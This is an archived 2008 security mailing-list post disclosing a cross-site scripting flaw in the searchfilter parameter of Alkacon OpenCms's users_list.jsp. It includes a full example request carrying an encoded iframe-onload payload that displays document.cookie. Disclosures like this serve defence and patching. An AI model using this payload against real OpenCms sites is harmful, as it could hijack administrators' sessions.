Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Alkacon OpenCms users_list.jsp searchfilter XSS

from [nnposter] Network Security [Permanent Link]
Subject: Alkacon OpenCms users_list.jsp searchfilter XSS
Date: 23 Mar 2008 03:03:04 -0000 
Alkacon OpenCms users_list.jsp searchfilter XSS


Product: Alkacon OpenCms 
http://www.opencms.org/


OpenCms contains a cross-site scripting vulnerability in the user management 
function. Input to parameter searchfilter in page 
opencms/system/workplace/admin/accounts/users_list.jsp is not sufficiently 
validated and/or sanitized before it gets embedded in the resulting web page.

Example:
http://(target)/opencms/system/workplace/admin/accounts/users_list.jsp?
ispopup=&action=listsearch&framename=&title=
&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit
&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=
&formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root=
&path=%252Faccounts%252Forgunit%252Fusers&redirect=
&searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E
&listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E


The vulnerability has been identified in version 7.0.3. However, other versions 
may be also affected.


Solution:
Users should not browse untrusted sites while logged into OpenCms.


Found by:
nnposter
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Alkacon OpenCms users_list.jsp searchfilter XSS, nnposter <=
Previous by Date:  Linksys phone adapter denial of service, sipherr
Next by Date:  RE: hacking the mitsubishi GB-50A, Desai, Ashish
Previous by Thread:  Linksys phone adapter denial of service, sipherr
Next by Thread:  [SECURITY] [DSA 1527-1] New debian-goodies packages fix privilege escalation, Thijs Kinkhorst
Indexes:  [Date] [Thread] [Top] [All Lists]